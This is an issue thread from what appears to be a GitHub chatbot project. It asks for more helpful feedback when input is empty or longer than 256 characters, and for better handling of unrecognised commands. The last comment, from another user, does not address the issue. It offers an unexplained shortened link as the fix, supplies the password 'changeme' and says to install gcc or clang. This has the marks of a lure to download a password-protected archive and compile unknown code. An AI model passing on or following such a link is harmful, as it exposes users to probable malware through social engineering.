### ISSUE TITLE
Basic Error Handling for Empty and Long Inputs

### ISSUE THREAD

**Issue by nexstephen** [nexstephen/cortex#11]
Issue Description: When the user provides an empty input or an input that exceeds the length limit, the chatbot provides minimal feedback, without offering much guidance on what the user should do.

    Steps to Reproduce:
        Start the chatbot.
        Input an empty string by pressing Enter.
        Input a string longer than 256 characters.
    Expected Behavior: The chatbot should respond with clear instructions like: "Input cannot be empty, please enter a valid command" or "Your input is too long, please shorten your message."
    Actual Behavior: The chatbot only responds with a basic message like "Input cannot be empty" or "Input too long."

Suggested Fix: Enhance the input validation feedback by giving the user more detailed instructions on how to correct the input, and log these cases for future debugging.

**Comment by nexstephen** [comment]
Open: The chatbot still provides a generic fallback response when an unrecognized command is entered. This can be improved to offer helpful suggestions or available commands.

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
